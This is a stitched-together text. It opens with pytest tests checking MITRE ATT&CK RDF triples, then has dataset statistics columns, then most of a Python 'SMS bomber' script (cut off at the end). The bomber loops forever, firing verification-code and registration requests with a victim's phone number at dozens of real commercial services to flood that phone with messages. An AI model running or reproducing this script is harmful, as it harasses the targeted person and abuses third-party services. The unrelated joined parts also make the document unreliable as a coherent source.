    'attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dc:rights "Copyright 2015-2020, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation." .',
    'attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:created "2017-06-01T00:00:00+00:00"^^xsd:dateTime .',
    'attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:creator attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 .',
    'attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:identifier "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" .',
]


def test_pre_triples(pre):
    """Every expected triple about the Acquire Infrastructure attack-pattern
    is in the graph.

    Data-driven replacement for the generated tests test_pre_0..34: asks each
    pattern against the fixture graph and reports ALL missing triples at once.
    """
    missing = [q for q in _PRE_TRIPLES if not bool(ask(pre, q))]
    assert not missing, "triples not found in graph:\n" + "\n".join(missing)
# Expected triples for the "Windows Remote Management Mitigation"
# course-of-action fixture. Each entry is the graph pattern handed to ask();
# this list replaces the generated one-function-per-triple tests
# (test_coa_0..45, numbering had gaps).
_COA_TRIPLES = [
    # course-of-action--3e9f8875 core properties (deprecated mitigation)
    'attack:course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025 a cti:CourseOfAction .',
    'attack:course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025 a cti:CourseOfAction; cti:deprecated true .',
    'attack:course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025 a cti:CourseOfAction; dcterms:created "2018-10-17T00:14:20.652000+00:00"^^xsd:dateTime .',
    'attack:course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025 a cti:CourseOfAction; dcterms:creator attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 .',
    # ?description: only checks that SOME definition literal exists
    'attack:course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025 a cti:CourseOfAction; skos:definition ?description .',
    'attack:course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025 a cti:CourseOfAction; dcterms:identifier "course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025" .',
    'attack:course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025 a cti:CourseOfAction; dcterms:modified "2020-01-17T16:46:19.274000+00:00"^^xsd:dateTime .',
    'attack:course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025 a cti:CourseOfAction; dcterms:references attack:ref_10cd53276fa4a04c57a6245455d530c7351fb0f1ff953f934da3a351d236063d .',
    'attack:course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025 a cti:CourseOfAction; dcterms:references attack:ref_5837614f71ddb654ecc9b572035f894bdfbf4af1d7219e61a150bf51d21487fe .',
    'attack:course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025 a cti:CourseOfAction; dcterms:rights attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 .',
    'attack:course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025 a cti:CourseOfAction; skos:prefLabel "Windows Remote Management Mitigation" .',
    # ref_10cd5327... (mitre-attack external reference T1028)
    'attack:ref_10cd53276fa4a04c57a6245455d530c7351fb0f1ff953f934da3a351d236063d a dcterms:BibliographicResource .',
    'attack:ref_10cd53276fa4a04c57a6245455d530c7351fb0f1ff953f934da3a351d236063d a dcterms:BibliographicResource; core:externalID "T1028" .',
    'attack:ref_10cd53276fa4a04c57a6245455d530c7351fb0f1ff953f934da3a351d236063d a dcterms:BibliographicResource; cti:referenceSource "mitre-attack" .',
    'attack:ref_10cd53276fa4a04c57a6245455d530c7351fb0f1ff953f934da3a351d236063d a dcterms:BibliographicResource; dcterms:identifier "mitre-attack--t1028"^^xsd:NMTOKEN .',
    'attack:ref_10cd53276fa4a04c57a6245455d530c7351fb0f1ff953f934da3a351d236063d a dcterms:BibliographicResource; dcterms:source "https://attack.mitre.org/mitigations/T1028"^^xsd:anyURI .',
    # ref_5837614f... (NSA "Spotting the Adversary" report)
    'attack:ref_5837614f71ddb654ecc9b572035f894bdfbf4af1d7219e61a150bf51d21487fe a dcterms:BibliographicResource .',
    'attack:ref_5837614f71ddb654ecc9b572035f894bdfbf4af1d7219e61a150bf51d21487fe a dcterms:BibliographicResource; cti:referenceSource "NSA Spotting" .',
    'attack:ref_5837614f71ddb654ecc9b572035f894bdfbf4af1d7219e61a150bf51d21487fe a dcterms:BibliographicResource; dcterms:bibliographicCitation "National Security Agency/Central Security Service Information Assurance Directorate. (2015, August 7). Spotting the Adversary with Windows Event Log Monitoring. Retrieved September 6, 2018." .',
    'attack:ref_5837614f71ddb654ecc9b572035f894bdfbf4af1d7219e61a150bf51d21487fe a dcterms:BibliographicResource; dcterms:identifier "nsa-spotting"^^xsd:NMTOKEN .',
    'attack:ref_5837614f71ddb654ecc9b572035f894bdfbf4af1d7219e61a150bf51d21487fe a dcterms:BibliographicResource; dcterms:source "https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm"^^xsd:anyURI .',
    # identity--c78cb6e5 (The MITRE Corporation)
    'attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization .',
    'attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:created "2017-06-01T00:00:00+00:00"^^xsd:dateTime .',
    'attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:identifier "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" .',
    'attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:modified "2017-06-01T00:00:00+00:00"^^xsd:dateTime .',
    'attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:rights attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 .',
    'attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; skos:prefLabel "The MITRE Corporation" .',
    # marking-definition--fa42a846 (copyright statement)
    'attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement .',
    'attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dc:rights "Copyright 2015-2020, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation." .',
    'attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:created "2017-06-01T00:00:00+00:00"^^xsd:dateTime .',
    'attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:creator attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 .',
    'attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:identifier "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" .',
]


def test_coa_triples(course_of_action):
    """Every expected triple about the Windows Remote Management Mitigation
    course-of-action is in the graph.

    Data-driven replacement for the generated tests test_coa_0..45: asks each
    pattern against the fixture graph and reports ALL missing triples at once.
    """
    missing = [q for q in _COA_TRIPLES if not bool(ask(course_of_action, q))]
    assert not missing, "triples not found in graph:\n" + "\n".join(missing)
def test_relationship_0(relationship):
qres = ask(relationship, "attack:ref_5101a421f9327bed0ca06ada8de2016b3a8ec1acc194803605b22ece0bd320d0 a dcterms:BibliographicResource .")
assert bool(qres)
def test_relationship_1(relationship):
qres = ask(relationship, "attack:ref_5101a421f9327bed0ca06ada8de2016b3a8ec1acc194803605b22ece0bd320d0 a dcterms:BibliographicResource; core:externalID \"T1094\" .")
assert bool(qres)
def test_relationship_2(relationship):
qres = ask(relationship, "attack:ref_5101a421f9327bed0ca06ada8de2016b3a8ec1acc194803605b22ece0bd320d0 a dcterms:BibliographicResource; cti:referenceSource \"mitre-attack\" .")
assert bool(qres)
def test_relationship_3(relationship):
qres = ask(relationship, "attack:ref_5101a421f9327bed0ca06ada8de2016b3a8ec1acc194803605b22ece0bd320d0 a dcterms:BibliographicResource; dcterms:identifier \"mitre-attack--t1094\"^^xsd:NMTOKEN .")
assert bool(qres)
def test_relationship_4(relationship):
qres = ask(relationship, "attack:ref_5101a421f9327bed0ca06ada8de2016b3a8ec1acc194803605b22ece0bd320d0 a dcterms:BibliographicResource; dcterms:source \"https://attack.mitre.org/techniques/T1094\"^^xsd:anyURI .")
assert bool(qres)
def test_relationship_11(relationship):
qres = ask(relationship, "attack:ref_6157d34c0500043adb0a408315fa796dc0803c8d63795bddb5ceea09f0d86844 a dcterms:BibliographicResource .")
assert bool(qres)
def test_relationship_12(relationship):
qres = ask(relationship, "attack:ref_6157d34c0500043adb0a408315fa796dc0803c8d63795bddb5ceea09f0d86844 a dcterms:BibliographicResource; core:externalID \"S0084\" .")
assert bool(qres)
def test_relationship_13(relationship):
qres = ask(relationship, "attack:ref_6157d34c0500043adb0a408315fa796dc0803c8d63795bddb5ceea09f0d86844 a dcterms:BibliographicResource; cti:referenceSource \"mitre-attack\" .")
assert bool(qres)
def test_relationship_14(relationship):
qres = ask(relationship, "attack:ref_6157d34c0500043adb0a408315fa796dc0803c8d63795bddb5ceea09f0d86844 a dcterms:BibliographicResource; dcterms:identifier \"mitre-attack--s0084\"^^xsd:NMTOKEN .")
assert bool(qres)
def test_relationship_15(relationship):
qres = ask(relationship, "attack:ref_6157d34c0500043adb0a408315fa796dc0803c8d63795bddb5ceea09f0d86844 a dcterms:BibliographicResource; dcterms:source \"https://attack.mitre.org/software/S0084\"^^xsd:anyURI.")
assert bool(qres)
def test_relationship_21(relationship):
qres = ask(relationship, "attack:ref_73df1a62ded98a7662059dc6d43efac817cfebe68c03dd6b38a3dba47fa0d68f a dcterms:BibliographicResource .")
assert bool(qres)
def test_relationship_22(relationship):
qres = ask(relationship, "attack:ref_73df1a62ded98a7662059dc6d43efac817cfebe68c03dd6b38a3dba47fa0d68f a dcterms:BibliographicResource; cti:referenceSource \"University of Birmingham C2\" .")
assert bool(qres)
def test_relationship_23(relationship):
qres = ask(relationship, "attack:ref_73df1a62ded98a7662059dc6d43efac817cfebe68c03dd6b38a3dba47fa0d68f a dcterms:BibliographicResource; dcterms:bibliographicCitation \"Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.\" .")
assert bool(qres)
def test_relationship_24(relationship):
qres = ask(relationship, "attack:ref_73df1a62ded98a7662059dc6d43efac817cfebe68c03dd6b38a3dba47fa0d68f a dcterms:BibliographicResource; dcterms:identifier \"university-of-birmingham-c2\"^^xsd:NMTOKEN .")
assert bool(qres)
def test_relationship_25(relationship):
qres = ask(relationship, "attack:ref_73df1a62ded98a7662059dc6d43efac817cfebe68c03dd6b38a3dba47fa0d68f a dcterms:BibliographicResource; dcterms:source \"https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf\"^^xsd:anyURI .")
assert bool(qres)
def test_relationship_31(relationship):
    """The relationship node is typed cti:UsesRelationship."""
    assert ask(relationship, "attack:relationship--00b84a9d-8f8c-4b12-9522-ce2d1a324c25 a cti:UsesRelationship .")


def test_relationship_32(relationship):
    """The relationship's source is the expected malware node."""
    assert ask(relationship, "attack:relationship--00b84a9d-8f8c-4b12-9522-ce2d1a324c25 a cti:UsesRelationship; cti:relationSource attack:malware--e1161124-f22e-487f-9d5f-ed8efc8dcd61 .")


def test_relationship_33(relationship):
    """The relationship's target is the expected attack-pattern node."""
    assert ask(relationship, "attack:relationship--00b84a9d-8f8c-4b12-9522-ce2d1a324c25 a cti:UsesRelationship; cti:relationTarget attack:attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00 .")


def test_relationship_34(relationship):
    """The relationship carries its creation timestamp."""
    assert ask(relationship, "attack:relationship--00b84a9d-8f8c-4b12-9522-ce2d1a324c25 a cti:UsesRelationship; dcterms:created \"2018-10-17T00:14:20.652000+00:00\"^^xsd:dateTime .")


def test_relationship_35(relationship):
    """The relationship names its creator identity."""
    assert ask(relationship, "attack:relationship--00b84a9d-8f8c-4b12-9522-ce2d1a324c25 a cti:UsesRelationship; dcterms:creator attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 .")


def test_relationship_36(relationship):
    """The relationship carries its skos:definition text."""
    assert ask(relationship, "attack:relationship--00b84a9d-8f8c-4b12-9522-ce2d1a324c25 a cti:UsesRelationship; skos:definition \"[Mis-Type](https://attack.mitre.org/software/S0084) network traffic can communicate over a raw socket.(Citation: Cylance Dust Storm)\" .")


def test_relationship_37(relationship):
    """The relationship carries its STIX identifier."""
    assert ask(relationship, "attack:relationship--00b84a9d-8f8c-4b12-9522-ce2d1a324c25 a cti:UsesRelationship; dcterms:identifier \"relationship--00b84a9d-8f8c-4b12-9522-ce2d1a324c25\" .")


def test_relationship_38(relationship):
    """The relationship carries its last-modified timestamp."""
    assert ask(relationship, "attack:relationship--00b84a9d-8f8c-4b12-9522-ce2d1a324c25 a cti:UsesRelationship; dcterms:modified \"2020-02-11T16:23:56.676000+00:00\"^^xsd:dateTime .")


def test_relationship_39(relationship):
    """The relationship references its bibliographic citation node."""
    assert ask(relationship, "attack:relationship--00b84a9d-8f8c-4b12-9522-ce2d1a324c25 a cti:UsesRelationship; dcterms:references attack:ref_8b666ea9985076cf3d380ce602ffb3056179cbafbe914fb4df991b71ac7d9506 .")


def test_relationship_40(relationship):
    """The relationship points at the MITRE marking-definition rights statement."""
    assert ask(relationship, "attack:relationship--00b84a9d-8f8c-4b12-9522-ce2d1a324c25 a cti:UsesRelationship; dcterms:rights attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 .")
def test_relationship_51(relationship):
    """The Cylance reference node is typed dcterms:BibliographicResource."""
    assert ask(relationship, "attack:ref_8b666ea9985076cf3d380ce602ffb3056179cbafbe914fb4df991b71ac7d9506 a dcterms:BibliographicResource .")


def test_relationship_52(relationship):
    """The reference carries its source-name string."""
    assert ask(relationship, "attack:ref_8b666ea9985076cf3d380ce602ffb3056179cbafbe914fb4df991b71ac7d9506 a dcterms:BibliographicResource; cti:referenceSource \"Cylance Dust Storm\" .")


def test_relationship_53(relationship):
    """The reference carries its full bibliographic citation."""
    assert ask(relationship, "attack:ref_8b666ea9985076cf3d380ce602ffb3056179cbafbe914fb4df991b71ac7d9506 a dcterms:BibliographicResource; dcterms:bibliographicCitation \"Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017.\" .")


def test_relationship_54(relationship):
    """The reference carries its NMTOKEN identifier."""
    assert ask(relationship, "attack:ref_8b666ea9985076cf3d380ce602ffb3056179cbafbe914fb4df991b71ac7d9506 a dcterms:BibliographicResource; dcterms:identifier \"cylance-dust-storm\"^^xsd:NMTOKEN .")


def test_relationship_55(relationship):
    """The reference carries its source report URI."""
    assert ask(relationship, "attack:ref_8b666ea9985076cf3d380ce602ffb3056179cbafbe914fb4df991b71ac7d9506 a dcterms:BibliographicResource; dcterms:source \"https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf\"^^xsd:anyURI .")
def test_relationship_61(relationship):
    """The MITRE identity node is typed foaf:Organization."""
    assert ask(relationship, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization .")


def test_relationship_62(relationship):
    """The identity carries its creation timestamp."""
    assert ask(relationship, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:created \"2017-06-01T00:00:00+00:00\"^^xsd:dateTime .")


def test_relationship_63(relationship):
    """The identity carries its STIX identifier."""
    assert ask(relationship, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:identifier \"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5\" .")


def test_relationship_64(relationship):
    """The identity carries its last-modified timestamp."""
    assert ask(relationship, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:modified \"2017-06-01T00:00:00+00:00\"^^xsd:dateTime .")


def test_relationship_65(relationship):
    """The identity points at the MITRE marking-definition rights statement."""
    assert ask(relationship, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; dcterms:rights attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 .")


def test_relationship_66(relationship):
    """The identity carries its preferred label."""
    assert ask(relationship, "attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 a foaf:Organization; skos:prefLabel \"The MITRE Corporation\" .")
def test_relationship_71(relationship):
    """The marking-definition node is typed dcterms:RightsStatement."""
    assert ask(relationship, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement .")


def test_relationship_72(relationship):
    """The rights statement carries the MITRE copyright text."""
    assert ask(relationship, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dc:rights \"Copyright 2015-2020, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation.\" .")


def test_relationship_73(relationship):
    """The rights statement carries its creation timestamp."""
    assert ask(relationship, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:created \"2017-06-01T00:00:00+00:00\"^^xsd:dateTime .")


def test_relationship_74(relationship):
    """The rights statement names its creator identity."""
    assert ask(relationship, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:creator attack:identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 .")


def test_relationship_75(relationship):
    """The rights statement carries its STIX identifier."""
    assert ask(relationship, "attack:marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 a dcterms:RightsStatement; dcterms:identifier \"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168\" .")
def test_relationship_81(relationship):
    """The attack-pattern node is typed cti:AttackPattern."""
    assert ask(relationship, "attack:attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00 a cti:AttackPattern .")


def test_relationship_82(relationship):
    """The attack-pattern is flagged as revoked."""
    assert ask(relationship, "attack:attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00 a cti:AttackPattern; cti:revoked true .")


def test_relationship_83(relationship):
    """The attack-pattern carries its creation timestamp."""
    assert ask(relationship, "attack:attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00 a cti:AttackPattern; dcterms:created \"2017-05-31T21:31:10.314000+00:00\"^^xsd:dateTime .")


def test_relationship_84(relationship):
    """The attack-pattern carries its STIX identifier."""
    assert ask(relationship, "attack:attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00 a cti:AttackPattern; dcterms:identifier \"attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00\" .")


def test_relationship_85(relationship):
    """The attack-pattern carries its last-modified timestamp."""
    assert ask(relationship, "attack:attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00 a cti:AttackPattern; dcterms:modified \"2020-03-20T19:03:04.295000+00:00\"^^xsd:dateTime .")


def test_relationship_86(relationship):
    """The attack-pattern references its first citation node."""
    assert ask(relationship, "attack:attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00 a cti:AttackPattern; dcterms:references attack:ref_5101a421f9327bed0ca06ada8de2016b3a8ec1acc194803605b22ece0bd320d0 .")


def test_relationship_87(relationship):
    """The attack-pattern references its second citation node."""
    assert ask(relationship, "attack:attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00 a cti:AttackPattern; dcterms:references attack:ref_73df1a62ded98a7662059dc6d43efac817cfebe68c03dd6b38a3dba47fa0d68f .")


def test_relationship_88(relationship):
    """The attack-pattern carries its preferred label."""
    assert ask(relationship, "attack:attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00 a cti:AttackPattern; skos:prefLabel \"Custom Command and Control Protocol\" .")
#def test_relationship_91(relationship):
# qres = ask(relationship, "?g a cti:RelationshipGraph")
# assert bool(qres)
#SELECT ?g ?s ?p ?o
#WHERE {
# GRAPH ?g {
# ?s ?p ?o
# } .
# ?g a cti:RelationshipGraph .
#}
#def test_relationship_92(relationship):
# qres = ask(relationship, "{ attack:malware--e1161124-f22e-487f-9d5f-ed8efc8dcd61 cti:uses attack:attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00 . } dcterms:created \"2018-10-17T00:14:20.652000+00:00\"^^xsd:dateTime")
# assert bool(qres)
| 56.986096
| 436
| 0.792838
| 6,332
| 53,282
| 6.518793
| 0.077543
| 0.035952
| 0.071904
| 0.086489
| 0.896674
| 0.879085
| 0.840977
| 0.812026
| 0.776486
| 0.750321
| 0
| 0.174739
| 0.096393
| 53,282
| 934
| 437
| 57.047109
| 0.68259
| 0.009365
| 0
| 0.326252
| 0
| 0.14871
| 0.498588
| 0.368999
| 0
| 0
| 0
| 0
| 0.318665
| 1
| 0.329287
| false
| 0
| 0.00607
| 0
| 0.338392
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c447eb654c8f2b4cb83e66f95acf009beb425590
| 52,696
|
py
|
Python
|
bomber.py
|
d0xo0/bombardier
|
bc1884bd0de3301f3628b333a532ee199738e1a4
|
[
"Apache-2.0"
] | 1
|
2022-01-27T21:53:35.000Z
|
2022-01-27T21:53:35.000Z
|
bomber.py
|
d0xo0/bombardier
|
bc1884bd0de3301f3628b333a532ee199738e1a4
|
[
"Apache-2.0"
] | null | null | null |
bomber.py
|
d0xo0/bombardier
|
bc1884bd0de3301f3628b333a532ee199738e1a4
|
[
"Apache-2.0"
] | null | null | null |
import requests, random
from requests import get
from bs4 import BeautifulSoup as bs
import colorama
from termcolor import colored
from tkinter import filedialog as fd
from tkinter import *
from tkinter import messagebox
from tkinter import Label
from random import randint
import threading, os, sys, time
colorama.init()
root = Tk()
root.title('Sms Bomber, by HZ')
root.geometry('500x400+300+200')
def good():
print(colored('SMS sent', 'green'))
def error():
print(colored('SMS not sent', 'red'))
def spamNOproxy(phone):
while True:
_name = ''
for x in range(12):
_name = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'))
password = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'))
username = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'))
_email = _name + '@gmail.com'
email = _name + '@gmail.com'
_phone = phone
_phone9 = _phone[1:]
_phoneAresBank = '+' + _phone[0] + '(' + _phone[1:4] + ')' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11]
_phone9dostavista = _phone9[:3] + '+' + _phone9[3:6] + '-' + _phone9[6:8] + '-' + _phone9[8:10]
_phoneOstin = '+' + _phone[0] + '+(' + _phone[1:4] + ')' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11]
_phonePizzahut = '+' + _phone[0] + ' (' + _phone[1:4] + ') ' + _phone[4:7] + ' ' + _phone[7:9] + ' ' + _phone[9:11]
_phoneGorzdrav = _phone[1:4] + ') ' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11]
_text = 'Ляля'
phone1 = '+' + phone[0] + ' ' + '(' + phone[1] + phone[2] + phone[3] + ')' + ' ' + phone[4] + phone[5] + phone[6] + '-' + phone[7] + phone[8] + '-' + phone[9] + phone[10]
phone2 = phone[1] + phone[2] + phone[3] + phone[4] + phone[5] + phone[6] + phone[7] + phone[8] + phone[9] + phone[10]
try:
requests.post('https://app.karusel.ru/api/v1/phone/', data={'phone': _phone}, headers={})
good()
except Exception as e:
error()
try:
requests.post('https://oauth.sovest.ru/oauth/authorize', data={'phone': _phone})
good()
except Exception as e:
error()
try:
requests.post('https://gorzdrav.org/login/register/sms/send', data={'phone': _phone9})
good()
except Exception as e:
error()
try:
requests.get('https://www.sportmaster.ru/user/session/sendSmsCode.do?phone=+' + _phone + '&_=1580559110407')
good()
except Exception as e:
error()
try:
requests.post('https://ctx.playfamily.ru/screenapi/v3/sendsmscode/web/1', data={'phone':_phone, 'password':password})
good()
except Exception as e:
error()
try:
requests.post('https://my.pozvonim.com/api/v1/auth/send/sms', data={'phone':_phone, 'origin':'https://my.pozvonim.com', 'referer':'https://my.pozvonim.com/register/', 'host':'my.pozvonim.com'})
good()
except Exception as e:
error()
try:
requests.get(('https://register.sipnet.ru/cgi-bin/exchange.dll/RegisterHelper?oper=9&callmode=1&phone=' + _phone), data={'host':'register.sipnet.ru', 'origin':'https://www.sipnet.ru', 'referer':'https://www.sipnet.ru/register'})
good()
except Exception as e:
error()
try:
requests.post('https://p.grabtaxi.com/api/passenger/v2/profiles/register', data={'phoneNumber':_phone, 'countryCode':'ID', 'name':'test', 'email':'mail@mail.com', 'deviceToken':'*'}, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'})
good()
except Exception as e:
error()
try:
requests.post('https://youla.ru/web-api/auth/request_code', data={'phone': _phone})
good()
except Exception as e:
error()
try:
requests.post('https://www.rabota.ru/remind', data={'credential': _phone})
good()
except Exception as e:
error()
try:
requests.post('https://www.smsint.ru/bitrix/templates/sms_intel/include/ajaxRegistrationTrigger.php', data={'name':_name, 'phone':_phone, 'promo':'yellowforma'})
good()
except Exception as e:
error()
try:
requests.post('https://www.mvideo.ru/internal-rest-api/common/atg/rest/actors/VerificationActor/getCodeForOtp', params={'pageName':'loginByUserPhoneVerification', 'fromCheckout':'false', 'fromRegisterPage':'true', 'snLogin':'', 'bpg':'', 'snProviderId':''}, data={'phone':'+7 915 3509908', 'g-recaptcha-response':'', 'recaptcha':'on'})
good()
except Exception as e:
error()
try:
requests.post('https://newnext.ru/graphql', json={'operationName':'registration', 'variables':{'client': {'firstName':'Иван', 'lastName':'Иванов', 'phone':_phone, 'typeKeys':['Unemployed']}}, 'query':'mutation registration($client: ClientInput!) {\n registration(client: $client) {\n token\n __typename\n }\n}\n'})
good()
except Exception as e:
error()
try:
requests.post('https://api.sunlight.net/v3/customers/authorization/', data={'phone': _phone})
good()
except Exception as e:
error()
try:
requests.post('https://alpari.com/api/ru/protection/deliver/2f178b17990ca4b7903aa834b9f54c2c0bcb01a2/', json={'client_type':'personal', 'email':_email, 'mobile_phone':_phone, 'deliveryOption':'sms'})
good()
except Exception as e:
error()
try:
requests.post('https://online.sbis.ru/reg/service/', json={'jsonrpc':'2.0', 'protocol':'5', 'method':'Пользователь.ЗаявкаНаФизика', 'params':{'phone': _phone}, 'id':'1'})
good()
except Exception as e:
error()
try:
requests.post('https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms', json={'phone': '+' + _phone})
good()
except Exception as e:
error()
try:
requests.post('https://lenta.com/api/v1/authentication/requestValidationCode', json={'phone': '+' + _phone})
good()
except Exception as e:
error()
try:
requests.post('https://cloud.mail.ru/api/v2/notify/applink', json={'phone':'+' + _phone, 'api':2, 'email':'email', 'x-email':'x-email'})
good()
except Exception as e:
error()
try:
requests.post('https://ok.ru/dk?cmd=AnonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone', data={'st.r.phone': '+' + _phone})
good()
except Exception as e:
error()
try:
requests.post('https://plink.tech/register/', json={'phone': _phone})
good()
except Exception as e:
error()
try:
requests.post('http://smsgorod.ru/sendsms.php', data={'number': _phone})
good()
except Exception as e:
error()
try:
requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': _phone})
good()
except Exception as e:
error()
try:
requests.post('https://passport.twitch.tv/register?trusted_request=true', json={'birthday':{'day':15, 'month':12, 'year':1997}, 'client_id':'kd1unb4b3q4t58fwlpcbzcbnm76a8fp', 'include_verification_code':True, 'password':password, 'phone_number':_phone, 'username':username})
good()
except Exception as e:
error()
try:
requests.post('https://cabinet.wi-fi.ru/api/auth/by-sms', data={'msisdn': _phone}, headers={'App-ID': 'cabinet'})
good()
except Exception as e:
error()
try:
requests.post('https://eda.yandex/api/v1/user/request_authentication_code', json={'phone_number': '+' + _phone})
good()
except Exception as e:
error()
try:
requests.post('https://api-prime.anytime.global/api/v2/auth/sendVerificationCode', data={'phone': _phone})
good()
except Exception as e:
error()
try:
requests.post('https://www.delivery-club.ru/ajax/user_otp', data={'phone': _phone})
good()
except Exception as e:
error()
try:
requests.post('https://ube.pmsm.org.ru/esb/iqos-phone/validate', json={'phone': _phone})
good()
except Exception as e:
error()
try:
requests.post('https://youdo.com/api/verification/sendverificationcode/', data={'PhoneE164': _phone})
good()
except Exception as e:
error()
try:
requests.post('https://www.citilink.ru/registration/confirm/phone/+' + _phone + '/')
good()
except Exception as e:
error()
try:
requests.post('https://tehnosvit.ua/iwantring_feedback.html', data={'feedbackName':_name, 'feedbackPhone':'+' + _phone})
good()
except Exception as e:
error()
try:
requests.post('https://mobileplanet.ua/register', data={'klient_name':_name, 'klient_phone':'+' + _phone, 'klient_email':_email})
good()
except Exception as e:
error()
try:
requests.post('https://protovar.com.ua/aj_record', data={'object':'callback', 'user_name':_name, 'contact_phone':_phone[3:]})
good()
except Exception as e:
error()
try:
